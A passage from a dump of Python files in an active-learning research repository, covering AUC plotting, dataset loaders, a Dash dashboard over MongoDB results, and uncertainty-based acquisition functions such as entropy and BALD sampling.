+ auc_1_active_std).reshape(\n len(auc_2_active_mean),\n ),\n (auc_1_active_mean - auc_1_active_std).reshape(\n len(auc_2_active_mean),\n ),\n alpha=0.05,\n color=\"b\",\n )\n\n ax.fill_between(\n [i for i in range(200)],\n (auc_2_active_mean + auc_2_active_std).reshape(\n len(auc_2_active_mean),\n ),\n (auc_2_active_mean - auc_2_active_std).reshape(\n len(auc_2_active_mean),\n ),\n alpha=0.05,\n color=\"g\",\n )\n\n ax.set_xlabel(\"Requests\", fontsize=17)\n ax.set_ylabel(\"AUC\", fontsize=17)\n ax.set_title(\n f\"{title} categories\",\n fontsize=17,\n )\n ax.legend(loc=\"lower right\", fontsize=16)\n\n return ax\n\n\ndef main():\n api = MongoDb()\n\n # alg_1 = \"bayesian_dropout_nn_fast_text_embeddings\"\n # alg_2 = \"bayesian_denfi_v_2_0.3_fast_text_embeddings\"\n\n # alg_legend_1 = \"Dropout\"\n # alg_legend_2 = \"DEnFi\"\n\n # categories = [\n # \"CRIME\",\n # \"POLITICS\",\n # \"COLLEGE\",\n # \"SPORTS\",\n # \"TECH\",\n # \"POSITIVE EMOTIONS TWEETS\",\n # ]\n # title_categories = [\n # \"Crime vs Good News\",\n # \"Politics vs Business\",\n # \"College vs Education\",\n # \"Sports vs Comedy\",\n # \"Tech vs Science\",\n # \"Positive Tweets vs Negative Tweets\",\n # ]\n\n # # font = {\"size\": 14}\n\n # # matplotlib.rc(\"font\", **font)\n\n # for index, (category, title_category) in enumerate(zip(categories, title_categories)):\n # # Random acquisition function\n # random_sampling_results_1 = api.get_model_results(\n # {\"model\": alg_1, \"acquisition_function\": \"random\", \"category_1\": category}\n # )[0]\n # random_sampling_results_2 = api.get_model_results(\n # {\"model\": alg_2, \"acquisition_function\": \"random\", \"category_1\": category}\n # )[0]\n\n # # Entropy acquisition function\n # entropy_sampling_results_1 = api.get_model_results(\n # {\"model\": alg_1, \"acquisition_function\": \"entropy\", \"category_1\": category}\n # )[0]\n # entropy_sampling_results_2 = api.get_model_results(\n # {\"model\": alg_2, \"acquisition_function\": \"entropy\", \"category_1\": category}\n # )[0]\n\n # ax = plt.subplot(2, 3, index + 1)\n # visualize_auc_evolutions(\n # ax,\n # 14,\n # random_sampling_results_1[\"results\"],\n # random_sampling_results_2[\"results\"],\n # entropy_sampling_results_1[\"results\"],\n # entropy_sampling_results_2[\"results\"],\n # alg_legend_1,\n # alg_legend_2,\n # title_category,\n # )\n\n alg_1 = \"bayesian_dropout_nn_fast_text_0.3\"\n alg_2 = \"bayesian_denfi_nn_fast_text_0.3\"\n alg_3 = \"bayesian_dropout_nn_roberta_0.1\"\n alg_4 = \"bayesian_denfi_nn_roberta_0.1\"\n alg_5 = \"bayesian_dropout_nn_laser_0.1\"\n alg_6 = \"bayesian_denfi_nn_laser_0.1\"\n\n alg_legend_1 = \"Dropout\"\n alg_legend_2 = \"DEnFi\"\n\n categories = [\n \"fake_news\",\n \"fake_news\",\n \"fake_news\",\n \"fake_news_detection\",\n \"fake_news_detection\",\n \"fake_news_detection\",\n ]\n title_categories = [\n \"Fast Text Fake vs True\",\n \"Laser Fake vs True\",\n \"Roberta Fake vs True\",\n \"Fast Text Fake vs True Detection\",\n \"Laser Fake vs True Detection\",\n \"Roberta Fake vs True Detection\",\n ]\n\n for index, (category, title_category) in enumerate(zip(categories, title_categories)):\n # Random acquisition function\n random_sampling_results_1 = api.get_model_results(\n {\n \"model\": alg_1 if index in {0, 3} else alg_5 if index in {1, 4} else alg_3,\n \"acquisition_function\": \"random\",\n \"category_1\": category,\n }\n )[0]\n random_sampling_results_2 = api.get_model_results(\n {\n \"model\": alg_2 if index in {0, 3} else alg_6 if index in {1, 4} else alg_4,\n \"acquisition_function\": \"random\",\n \"category_1\": category,\n }\n )[0]\n\n # Entropy acquisition function\n entropy_sampling_results_1 = api.get_model_results(\n {\n \"model\": alg_1 if index in {0, 3} else alg_5 if index in {1, 4} else alg_3,\n \"acquisition_function\": \"entropy\",\n \"category_1\": category,\n }\n )[0]\n entropy_sampling_results_2 = api.get_model_results(\n {\n \"model\": alg_2 if index in {0, 3} else alg_6 if index in {1, 4} else alg_4,\n \"acquisition_function\": \"entropy\",\n \"category_1\": category,\n }\n )[0]\n\n ax = plt.subplot(2, 3, index + 1)\n visualize_auc_evolutions(\n ax,\n 14,\n random_sampling_results_1[\"results\"],\n random_sampling_results_2[\"results\"],\n entropy_sampling_results_1[\"results\"],\n entropy_sampling_results_2[\"results\"],\n alg_legend_1,\n alg_legend_2,\n title_category,\n )\n\n plt.subplots_adjust(left=None, bottom=None, right=None, top=None, wspace=0.2, hspace=0.3)\n plt.show()\n\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.5917387008666992,
"alphanum_fraction": 0.5936599373817444,
"avg_line_length": 26.394737243652344,
"blob_id": "8f8a8fd369fbf69e3915e24ecd0b974db5ded5e3",
"content_id": "6f231176374eba30151ca9f8e3e101b57b6ac15a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1041,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 38,
"path": "/Peony_project/Peony_database/src/datasets/emotion_tweets.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "import pandas as pd\nfrom pathlib import Path\nfrom typing import Dict, List, Any\nfrom Peony_database.src.datasets.common import create_hash\nfrom tqdm import tqdm\n\n\nCOLLECTION_NAME = \"emotion_tweets\"\nCOLLECTION_ID = 13\n\n\ndef transorm_data(record: Dict[str, Any]) -> Dict[str, Any]:\n transormed_record: dict = {}\n transormed_record[\"datasetName\"] = COLLECTION_NAME\n transormed_record[\"datasetId\"] = COLLECTION_ID\n transormed_record[\"record\"] = {}\n transormed_record[\"record\"][\"id\"] = create_hash([record[\"body\"]])\n transormed_record[\"record\"][\"text\"] = {\n \"title\": record[\"title\"],\n \"body\": record[\"body\"],\n }\n transormed_record[\"record\"][\"label\"] = record[\"label\"]\n return transormed_record\n\n\ndef load_data(path: Path) -> List[dict]:\n data: list = []\n\n df = pd.read_csv(path)\n for _, row in df.iterrows():\n data.append(\n {\n \"title\": \"\",\n \"body\": row[\"content\"],\n \"label\": row[\"sentiment\"],\n }\n )\n return data\n"
},
{
"alpha_fraction": 0.3844710886478424,
"alphanum_fraction": 0.4044123589992523,
"avg_line_length": 33.6845817565918,
"blob_id": "10243d53e3a0f09ed273aa883508ec80b2443f62",
"content_id": "07114a593bcd2887c3ddcb0bf4e52afd2f080089",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 24522,
"license_type": "no_license",
"max_line_length": 273,
"num_lines": 707,
"path": "/Peony_project/Peony_visualization/src/Dashboard/app.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "import dash\nimport os\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport plotly.express as px\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport plotly.graph_objects as go\nimport datetime\nimport re\n\nfrom dash.dependencies import Input, Output, State\nfrom plotly.colors import n_colors\nfrom PeonyPackage.PeonyDb import MongoDb\nfrom Peony_database.src.database_results.results_summary import PeonyDbResults\n\nexternal_stylesheets = [\"https://codepen.io/chriddyp/pen/bWLwgP.css\"]\napi = MongoDb()\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets)\ndatabase_results = PeonyDbResults()\n\ntabs_styles = {\"height\": \"44px\"}\n\ntab_style = {\n \"borderBottom\": \"1px solid #d6d6d6\",\n \"padding\": \"6px\",\n}\n\ntab_selected_style = {\n \"borderTop\": \"1px solid #d6d6d6\",\n \"borderBottom\": \"1px solid #d6d6d6\",\n \"backgroundColor\": \"#1f2e2e\",\n \"color\": \"white\",\n \"padding\": \"6px\",\n}\n\n\ndef hamming_distance(chaine1, chaine2):\n return sum(c1 != c2 for c1, c2 in zip(chaine1, chaine2))\n\n\ndef find_similar_algorithms_in_db(alg):\n db_algs = database_results.structurize_data()\n similar_algs = []\n for db_alg in db_algs:\n str_non_similarity = hamming_distance(alg, db_alg)\n if str_non_similarity <= 2:\n similar_algs.append(db_alg)\n return sorted(similar_algs)\n\n\ndef create_evolution_table_stats(res, mean_func, dev_func, slider_val):\n slider_val = slider_val - 1\n return [round(mean_func(res, axis=0)[0][0], 3)] + [\n round(mean_func(res, axis=0)[int((i * 200 / (slider_val) - 1))][0], 3)\n for i in range(1, slider_val + 1)\n ]\n\n\ndef get_res_from_db(alg, acsq_func, category_1, category_2):\n res = api.get_model_results(\n {\n \"model\": alg,\n \"acquisition_function\": acsq_func,\n \"category_1\": category_1,\n \"category_2\": category_2,\n }\n )\n return res[0][\"results\"] if res else None\n\n\ndef create_evloution_table(category, algs, slider_val):\n\n dev_func = np.std\n mean_func = np.mean\n\n alg_legend = \" \".join([token.capitalize() for token in algs[0].split(\"_\")[:2]])\n category_1, category_2 = [\n val.strip().upper() for val in re.sub(\"_\", \" \", category).split(\"vs\")\n ]\n\n title_category = \" \".join([category_1.capitalize(), \"Vs.\", category_2.capitalize()])\n\n if len(algs) == 1:\n return html.H4(\n f\"No additional noise visualization data in Db found for {title_category} and {alg_legend}\"\n )\n\n list_w_results = []\n\n for alg in algs:\n res = get_res_from_db(alg, \"entropy\", category_1, category_2)\n if res is None:\n return html.H4(\n f\"No additional noise visualization data in Db found for {title_category} and {alg_legend}\"\n )\n list_w_results.append(\n create_evolution_table_stats(res, mean_func, dev_func, slider_val)\n )\n\n list_w_results = list(map(list, zip(*list_w_results)))\n noise_var = [0.1, 0.2, 0.3, 0.4, 0.6]\n colors = n_colors(\"rgb(172, 193, 198)\", \"rgb(2, 52, 81)\", 5, colortype=\"rgb\")\n table_to_vis = [noise_var] + [val for val in list_w_results]\n slider_val -= 1\n fig = go.Figure(\n data=[\n go.Table(\n header=dict(\n values=[\"<b>Noise Variance</b>\", \"<b>0</b>\"]\n + [\n f\"<b>{int(i * 200 / (slider_val))}</b>\"\n for i in range(1, slider_val + 1)\n ],\n font_size=13,\n align=\"center\",\n height=40,\n ),\n cells=dict(\n values=table_to_vis,\n fill_color=[\n np.array(colors)[np.argsort(np.argsort(val))]\n for val in table_to_vis\n ],\n align=\"center\",\n font_size=13,\n height=40,\n ),\n )\n ]\n )\n\n fig.update_layout(\n height=500,\n width=1000,\n title_text=f\"{alg_legend} Algorithm with Respect to Different Additive Noise\",\n )\n fig.layout.template = \"plotly_dark\"\n return dcc.Graph(figure=fig)\n\n\ndef visualize_auc_evolutions(\n auc_seq_passive_1,\n auc_seq_passive_2,\n auc_seq_active_1,\n auc_seq_active_2,\n model_1,\n model_2,\n title,\n):\n\n auc_1_passive_mean = np.mean(auc_seq_passive_1, axis=0).reshape(-1)\n auc_1_passive_std = np.std(auc_seq_passive_1, axis=0).reshape(-1)\n\n auc_2_passive_mean = np.mean(auc_seq_passive_2, axis=0).reshape(-1)\n auc_2_passive_std = np.std(auc_seq_passive_2, axis=0).reshape(-1)\n\n auc_1_active_mean = np.mean(auc_seq_active_1, axis=0).reshape(-1)\n auc_1_active_std = np.std(auc_seq_active_1, axis=0).reshape(-1)\n\n auc_2_active_mean = np.mean(auc_seq_active_2, axis=0).reshape(-1)\n auc_2_active_std = np.std(auc_seq_active_2, axis=0).reshape(-1)\n\n fig = go.Figure()\n fig.layout.template = \"plotly_dark\"\n\n # Passive learning\n\n y_upper = auc_1_passive_mean + auc_1_passive_std\n y_lower = auc_1_passive_mean - auc_1_passive_std\n fig.add_trace(\n go.Scatter(\n x=list(range(200)) + list(range(200))[::-1],\n y=np.concatenate(\n [y_upper, y_lower[::-1]],\n ),\n line=dict(color=\"rgb(171, 235, 198)\", dash=\"dash\", width=1),\n fill=\"toself\",\n fillcolor=\"rgba(234, 250, 241, 0.2)\",\n name=f\"Random Selection {model_1} mean\",\n showlegend=False,\n )\n )\n\n y_upper = auc_2_passive_mean + auc_2_passive_std\n y_lower = auc_2_passive_mean - auc_2_passive_std\n fig.add_trace(\n go.Scatter(\n x=list(range(200)) + list(range(200))[::-1],\n y=np.concatenate(\n [y_upper, y_lower[::-1]],\n ),\n line=dict(color=\"rgb(210, 180, 222)\", dash=\"dash\", width=1),\n fill=\"toself\",\n fillcolor=\"rgba(244, 236, 247, 0.2)\",\n name=f\"Random Selection {model_2} mean\",\n showlegend=False,\n )\n )\n\n fig.add_trace(\n go.Scatter(\n x=list(range(200)),\n y=auc_1_passive_mean,\n name=f\"Random Selection {model_1} mean\",\n line=dict(\n color=\"rgb(46, 204, 113)\",\n width=2,\n ),\n )\n )\n\n fig.add_trace(\n go.Scatter(\n x=list(range(200)),\n y=auc_2_passive_mean,\n name=f\"Random Selection {model_2} mean\",\n line=dict(\n color=\"rgb(165, 105, 189)\",\n width=2,\n ),\n )\n )\n\n # Active learning\n\n y_upper = auc_1_active_mean + auc_1_active_std\n y_lower = auc_1_active_mean - auc_1_active_std\n fig.add_trace(\n go.Scatter(\n x=list(range(200)) + list(range(200))[::-1],\n y=np.concatenate(\n [y_upper, y_lower[::-1]],\n ),\n line=dict(color=\"rgb(130, 224, 170)\", dash=\"dash\", width=1),\n fill=\"toself\",\n fillcolor=\"rgba(213, 245, 227, 0.5)\",\n name=f\"Random Selection {model_1} mean\",\n showlegend=False,\n )\n )\n\n y_upper = auc_2_active_mean + auc_2_active_std\n y_lower = auc_2_active_mean - auc_2_active_std\n fig.add_trace(\n go.Scatter(\n x=list(range(200)) + list(range(200))[::-1],\n y=np.concatenate(\n [y_upper, y_lower[::-1]],\n ),\n line=dict(color=\"rgb(187, 143, 206)\", dash=\"dash\", width=1),\n fill=\"toself\",\n fillcolor=\"rgba(232, 218, 239, 0.5)\",\n name=f\"Random Selection {model_2} mean\",\n showlegend=False,\n )\n )\n\n fig.add_trace(\n go.Scatter(\n x=list(range(200)),\n y=auc_1_active_mean,\n name=f\"Active Learning {model_1} mean\",\n line=dict(\n color=\"rgb(35, 155, 86)\",\n width=2,\n ),\n )\n )\n\n fig.add_trace(\n go.Scatter(\n x=list(range(200)),\n y=auc_2_active_mean,\n name=f\"Active Learning {model_2} mean\",\n line=dict(\n color=\"rgb(108, 52, 131)\",\n width=2,\n ),\n )\n )\n\n fig.update_layout(\n title_text=f\"{title} categories\",\n yaxis_title=\"AUC\",\n xaxis_title=\"Learning Iterations\",\n )\n\n fig.update_layout(\n height=500, width=1000, legend=dict(y=0.01, xanchor=\"right\", x=0.99)\n )\n\n return fig\n\n\ndef create_plot(categories_list, alg_1, alg_2):\n\n list_of_plots = []\n\n alg_legend_1 = \" \".join([token.capitalize() for token in alg_1.split(\"_\")[:2]])\n alg_legend_2 = \" \".join([token.capitalize() for token in alg_2.split(\"_\")[:2]])\n\n for index, categories_string in enumerate(categories_list):\n\n category_1, category_2 = [\n val.strip().upper()\n for val in re.sub(\"_\", \" \", categories_string).split(\"vs\")\n ]\n title_category = \" \".join(\n [category_1.capitalize(), \"Vs.\", category_2.capitalize()]\n )\n\n # Random acquisition function\n random_sampling_results_1 = get_res_from_db(\n alg_1, \"random\", category_1, category_2\n )\n random_sampling_results_2 = get_res_from_db(\n alg_2, \"random\", category_1, category_2\n )\n\n # Entropy acquisition function\n entropy_sampling_results_1 = get_res_from_db(\n alg_1, \"entropy\", category_1, category_2\n )\n entropy_sampling_results_2 = get_res_from_db(\n alg_2, \"entropy\", category_1, category_2\n )\n\n list_of_plots.append(\n dcc.Graph(\n id=f\"graph_{index}\",\n figure=visualize_auc_evolutions(\n random_sampling_results_1,\n random_sampling_results_2,\n entropy_sampling_results_1,\n entropy_sampling_results_2,\n alg_legend_1,\n alg_legend_2,\n title_category,\n ),\n )\n if all(\n [\n random_sampling_results_1,\n random_sampling_results_2,\n entropy_sampling_results_1,\n entropy_sampling_results_2,\n ]\n )\n else html.H5(f\"No data in Db found for {title_category} AUC visualization\")\n )\n\n return list_of_plots\n\n\napp.layout = html.Div(\n className=\"row\",\n children=[\n dcc.Store(id=\"visualized-categories\", storage_type=\"session\"),\n dcc.Store(id=\"tmp\", storage_type=\"session\"),\n html.Div(\n className=\"div-left-panel\",\n children=[\n # HEADLINE\n html.H5(\n children=\"Peony Visualization Component\",\n style={\"text-align\": \"center\"},\n ),\n # LOGO AND DESCRIPTION\n html.Div(\n className=\"div-info\",\n children=[\n html.Img(\n className=\"logo\",\n src=app.get_asset_url(\"peony-logo.png\"),\n ),\n html.P(\n \"\"\"\n This tool is made to visualize and compare different \n evolutions of the active learning algorythms. \n \"\"\",\n style={\"text-align\": \"center\"},\n ),\n ],\n ),\n # DROPDOWN\n html.Div(\n className=\"drop-downs\",\n children=[\n html.P(\n children=\"Available Categories\",\n style={\"text-align\": \"center\"},\n ),\n dcc.Dropdown(\n id=\"categories-dropdown\",\n options=[\n {\n \"label\": \"Crime Vs. Good News\",\n \"value\": \"crime_vs_good_news\",\n },\n {\n \"label\": \"Sports Vs. Comedy\",\n \"value\": \"sports_vs_comedy\",\n },\n {\n \"label\": \"Politics Vs. Business\",\n \"value\": \"politics_vs_business\",\n },\n {\n \"label\": \"Tech Vs. Science\",\n \"value\": \"tech_vs_science\",\n },\n {\n \"label\": \"College Vs. Education\",\n \"value\": \"college_vs_education\",\n },\n {\n \"label\": \"Positive Vs. Negative Tweets\",\n \"value\": \"positive_emotions_tweets_vs_negative_emotions_tweets\",\n },\n {\n \"label\": \"Reset\",\n \"value\": \"reset\",\n },\n ],\n clearable=False,\n style={\n \"width\": \"200pt\",\n },\n ),\n ],\n ),\n html.Div(\n children=[\n html.P(\n children=\"MongoDb Stored Algorithms\",\n style={\"text-align\": \"center\"},\n ),\n dcc.Dropdown(\n id=\"first-alg-dropdown\",\n options=[\n {\n \"label\": \" \".join(\n [token.capitalize() for token in key.split(\"_\")]\n ),\n \"value\": key,\n }\n for key in sorted(database_results.structurize_data())\n ],\n optionHeight=70,\n clearable=True,\n style={\n \"width\": \"100%\",\n \"display\": \"inline-block\",\n \"font-size\": \"100%\",\n },\n ),\n dcc.Dropdown(\n id=\"second-alg-dropdown\",\n options=[\n {\n \"label\": \" \".join(\n [token.capitalize() for token in key.split(\"_\")]\n ),\n \"value\": key,\n }\n for key in sorted(database_results.structurize_data())\n ],\n optionHeight=70,\n style={\n \"width\": \"100%\",\n \"display\": \"inline-block\",\n \"font-size\": \"100%\",\n \"align-items\": \"center\",\n },\n ),\n ],\n style={\n \"width\": \"200pt\",\n \"display\": \"inline-block\",\n \"margin-top\": \"20pt\",\n },\n ),\n ],\n style={\n \"width\": \"200pt\",\n \"display\": \"inline-block\",\n \"height\": \"2000pt\",\n },\n ),\n # RIGHT PANEL WITH CHARTS\n html.Div(\n id=\"charts\",\n className=\"learning-chart\",\n style={\n \"display\": \"inline-block\",\n \"horizontal-align\": \"right\",\n \"margin-left\": \"1%\",\n \"width\": \"100%\",\n },\n children=[\n dcc.Tabs(\n id=\"tabs\",\n value=\"tab-1\",\n children=[\n dcc.Tab(\n label=\"AUC Evolutions\",\n value=\"tab-1\",\n style=tab_style,\n selected_style=tab_selected_style,\n children=[\n html.Div(\n id=\"div-w-plots\",\n ),\n ],\n ),\n dcc.Tab(\n label=\"Additive Noise Results Fluctuation\",\n value=\"tab-2\",\n style=tab_style,\n selected_style=tab_selected_style,\n children=[\n html.Div(\n children=[\n html.H5(\n children=[\n \"Slide bar to visualize number of table columns\"\n ],\n style={\n \"text-align\": \"center\",\n \"margin-bottom\": \"10pt\",\n \"margin-top\": \"10pt\",\n },\n ),\n dcc.Slider(\n id=\"slider\",\n min=2,\n max=10,\n value=5,\n marks={\n str(i): str(i) for i in range(2, 11)\n },\n step=None,\n ),\n ],\n ),\n ],\n ),\n ],\n style={\"display\": \"flex\", \"width\": \"100%\"},\n colors={\n \"background\": \"black\",\n },\n ),\n html.Div(id=\"tabs-content-classes\"),\n ],\n ),\n ],\n style={\"display\": \"flex\"},\n)\n\n\ndef intro_page():\n return [\n html.Div(\n children=[\n html.H6(\n children=[\n \"\"\"\n Peony Visualization Component serves as an endpoint that queries MongoDb and visualizes machine learning results.\n The visualization component is implemented in Dash by PlotLy.\n \"\"\"\n ],\n style={\n # \"text-align\": \"center\",\n \"margin-bottom\": \"20pt\",\n \"margin-top\": \"40pt\",\n \"margin-right\": \"10%\",\n \"margin-left\": \"10%\",\n },\n ),\n html.Div(\n children=[\n html.Img(\n className=\"dash-mongo-logo\",\n src=app.get_asset_url(\"dash-mongo.png\"),\n style={\n \"height\": \"100%\",\n \"width\": \"100%\",\n # \"display\": \"inline-block\",\n },\n ),\n ],\n ),\n html.H6(\n children=[\n \"\"\"\n The tool allows a user to visualize AUC (Area Under ROC curve) evolutions and Additive Noise Fluctuations concerning different categories.\n \n Categories and results for different algorithms can be found in dropdown menus. \n\n Both plots and tables are interactive. Thus, a user can extract more information. Moreover, a user can also download a plot or a table. Peony Visualization Component serves as an endpoint that queries MongoDb and visualizes machine learning results.\n The visualization component is implemented in Dash by PlotLy.\n\n\n \"\"\"\n ],\n style={\n # \"text-align\": \"center\",\n \"margin-bottom\": \"20pt\",\n \"margin-top\": \"20pt\",\n \"margin-right\": \"10%\",\n \"margin-left\": \"10%\",\n },\n ),\n html.H6(\n children=[\"\"\"Author: Marko Sahan\"\"\"],\n style={\n \"margin-top\": \"40pt\",\n \"margin-right\": \"10%\",\n \"margin-left\": \"10%\",\n },\n ),\n html.A(\n \"Peony Project GitHub\",\n href=\"https://github.com/sahanmar/Peony/\",\n style={\n \"margin-right\": \"10%\",\n \"margin-left\": \"10%\",\n },\n ),\n ]\n )\n ]\n\n\[email protected](\n Output(\"tmp\", \"data\"),\n [\n Input(\"visualized-categories\", \"data\"),\n ],\n)\ndef create_temp_variable(categories):\n if categories is None: # isinstance(categories, dict):\n return [\"crime_vs_good_news\"]\n return categories\n\n\[email protected](\n [\n Output(\"tabs-content-classes\", \"children\"),\n Output(\"visualized-categories\", \"data\"),\n ],\n [\n Input(\"categories-dropdown\", \"value\"),\n Input(\"first-alg-dropdown\", \"value\"),\n Input(\"second-alg-dropdown\", \"value\"),\n Input(\"tabs\", \"value\"),\n Input(\"slider\", \"value\"),\n Input(\"tmp\", \"data\"),\n ],\n)\ndef update_figure(\n categories_string, first_alg, second_alg, tab, slider_val, categories\n):\n if tab == \"tab-1\":\n # Load tab one\n if categories_string is None or categories_string == \"reset\":\n return intro_page(), []\n if first_alg is None or second_alg is None:\n return intro_page(), []\n if categories_string not in categories:\n categories.append(categories_string)\n return create_plot(categories, first_alg, second_alg), categories\n else:\n # Load tab two\n if categories is None or first_alg is None or second_alg is None:\n return intro_page(), categories\n else:\n if categories_string is None or categories_string == \"reset\":\n return intro_page(), []\n if categories_string not in categories:\n categories.append(categories_string)\n alg_1_similar = find_similar_algorithms_in_db(first_alg)\n alg_2_similar = find_similar_algorithms_in_db(second_alg)\n return (\n [\n html.Div(\n id=f\"table_{index}\",\n children=[\n create_evloution_table(category, alg_1_similar, slider_val),\n create_evloution_table(category, alg_2_similar, slider_val),\n ],\n )\n for index, category in enumerate(categories)\n ],\n categories,\n )\n\n\nif __name__ == \"__main__\":\n app.run_server(\n host=os.getenv(\"localhost\", \"127.0.0.1\"),\n debug=True,\n dev_tools_ui=False,\n )\n"
},
{
"alpha_fraction": 0.6534090638160706,
"alphanum_fraction": 0.654356062412262,
"avg_line_length": 32,
"blob_id": "84b809c98a849b30812ec6d2335889168378eafb",
"content_id": "43878c95ca79cba073c2f4fbf47e28c8da3365bb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1056,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 32,
"path": "/Peony_project/Peony_database/src/datasets/Comments_dataset.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "import json\n\nfrom pathlib import Path\nfrom typing import Dict, List, Any\nfrom Peony_database.src.datasets.common import create_hash\nfrom tqdm import tqdm\n\n\nCOLLECTION_NAME = \"Comments_dataset\"\n\n\ndef transorm_data(record: Dict[str, Any]) -> Dict[str, Any]:\n transormed_record: dict = {}\n transormed_record[\"datasetName\"] = COLLECTION_NAME\n transormed_record[\"datasetId\"] = 4\n transormed_record[\"record\"] = {}\n transormed_record[\"record\"][\"id\"] = create_hash(\n [record[\"content\"], str(record[\"metadata\"][\"first_done_at\"])]\n )\n transormed_record[\"record\"][\"text\"] = {\"body\": record[\"content\"]}\n transormed_record[\"record\"][\"label\"] = record[\"annotation\"][\"labels\"]\n transormed_record[\"record\"][\"metadata\"] = {\n \"first_done_at\": record[\"metadata\"][\"first_done_at\"],\n \"last_updated_by\": record[\"metadata\"][\"last_updated_by\"],\n }\n return transormed_record\n\n\ndef load_data(path: Path) -> List[dict]:\n with open(path, \"r\") as f:\n lines = f.readlines()\n return [json.loads(line) for line in lines]\n"
},
{
"alpha_fraction": 0.6146710515022278,
"alphanum_fraction": 0.62095046043396,
"avg_line_length": 30.995433807373047,
"blob_id": "9e21492027eb30cd255b1619b3f122d19a6e856c",
"content_id": "d592ad9a76ca850e0129409fe7661e33373ace52",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7007,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 219,
"path": "/Peony_project/Peony_box/src/acquisition_functions/functions.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "from telnetlib import IP\nfrom tkinter.tix import Tree\nfrom matplotlib.pyplot import axis\nimport torch\n\nimport numpy as np\n\nfrom typing import Dict, Any, List, Callable\nfrom omegaconf import base\nfrom scipy.stats import entropy\nfrom sklearn.cluster import AgglomerativeClustering\n\nfrom itertools import combinations, product, count\n\nfrom tqdm import tqdm\n\nBASE = 2\nGUMBEL_BETA = 8\n\n\ndef random_sampling(labels: np.ndarray, batch_size: int) -> np.ndarray:\n labels = [np.argmax(l, axis=1) for l in labels]\n labels = np.mean(labels, axis=0)\n return np.random.randint(labels.shape[0], size=batch_size).astype(int)\n\n\ndef entropy_sampling(labels: np.ndarray, batch_size: int, instances: np.ndarray) -> np.ndarray:\n # instances are not used. They are given here in order to preserve unification\n\n dist_samples = len(labels)\n prediction_entropy = np.sum(entropy(labels, base=BASE, axis=2), axis=0) / dist_samples\n max_entropy_indices: List[int] = []\n\n for _ in range(batch_size):\n max_entropy_index = np.argmax(prediction_entropy)\n max_entropy_indices.append(max_entropy_index)\n prediction_entropy[max_entropy_index] = -np.inf\n\n return np.asarray(max_entropy_indices)\n\n\ndef batch_bald(labels: np.ndarray, batch_size: int, instances: np.ndarray) -> np.ndarray:\n\n nn_dist_sample_num = len(labels)\n idx_comb_2_return = []\n indices_to_iterate = list(range(len(labels[0])))\n\n print(\"Batch Bald sampling...\")\n for values_sampled in tqdm(range(1, batch_size + 1)):\n max_mutual_information = -np.inf\n for idx in indices_to_iterate:\n if idx in idx_comb_2_return:\n continue\n idx_comb = idx_comb_2_return.copy()\n idx_comb.append(idx)\n\n comb_labels = labels[:, idx_comb]\n\n expected_class_entropy = np.sum(entropy(comb_labels, base=BASE, axis=2)) / nn_dist_sample_num\n mutual_labels_prob_dist_entropy = entropy(\n [\n np.sum(\n [\n np.prod([sample[i] for sample, i in zip(nn_dist_sample, cartesian_comb)])\n for nn_dist_sample in comb_labels\n ],\n axis=0,\n )\n / nn_dist_sample_num\n for cartesian_comb in product(*[[0, 1] for i in range(values_sampled)])\n ],\n base=BASE,\n axis=0,\n )\n\n mutual_information = mutual_labels_prob_dist_entropy - expected_class_entropy\n\n if mutual_information > max_mutual_information:\n\n max_mutual_information = mutual_information\n max_inform_idx = idx\n\n idx_comb_2_return.append(max_inform_idx)\n\n return np.asarray(idx_comb_2_return)\n\n\ndef hac_sampling(\n labels: np.ndarray,\n batch_size: int,\n instances: np.ndarray,\n acq_func: Callable[[Any], np.ndarray],\n aggregate_sentence_embeds=True,\n criterion: str = \"size\",\n) -> np.ndarray:\n\n high_entropy_values = acq_func(labels, batch_size=10 * batch_size, instances=instances)\n\n if aggregate_sentence_embeds:\n instances = torch.stack([torch.mean(torch.stack(row, dim=0), dim=0) for row in instances], dim=0)\n\n model = AgglomerativeClustering(linkage=\"average\").fit(instances.cpu())\n cluster_tree = dict(enumerate(model.children_, model.n_leaves_))\n\n cluster_criterion = []\n high_entropy_clusters = {}\n for high_entropy_val_idx in high_entropy_values:\n for cluster, components in cluster_tree.items():\n if high_entropy_val_idx in components:\n high_entropy_clusters.setdefault(cluster, []).append(high_entropy_val_idx)\n if cluster not in cluster_criterion:\n cluster_criterion.append(cluster)\n\n if criterion == \"size\":\n cluster_criterion = [\n cluster\n for cluster, size in sorted(\n [(key, _get_cluster_sizes(key, cluster_tree)) for key in cluster_tree], key=lambda x: x[1]\n )\n ]\n\n ids_2_return = []\n for cluster_id in cluster_criterion:\n if len(ids_2_return) > batch_size:\n break\n if cluster_id in high_entropy_clusters and high_entropy_clusters[cluster_id]:\n index_to_add = high_entropy_clusters[cluster_id].pop(0)\n ids_2_return.append(index_to_add)\n\n if len(ids_2_return) > batch_size:\n print(f\"Smth went wrong, only {len(ids_2_return)} values sampled instead of {batch_size}\")\n\n return ids_2_return\n\n\ndef hac_entropy_sampling(\n labels: np.ndarray,\n batch_size: int,\n instances: np.ndarray,\n aggregate_sentence_embeds=True,\n criterion: str = \"size\",\n) -> np.ndarray:\n\n return hac_sampling(labels, batch_size, instances, entropy_sampling, aggregate_sentence_embeds, criterion)\n\n\ndef bald(labels: np.ndarray) -> np.ndarray:\n nn_dist_sample_num = len(labels)\n expected_class_entropy = np.sum(entropy(labels, base=BASE, axis=2), axis=0) / nn_dist_sample_num\n mutual_labels_prob_dist_entropy = entropy(\n [\n np.sum(labels[:, :, 0], axis=0) / nn_dist_sample_num,\n np.sum(labels[:, :, 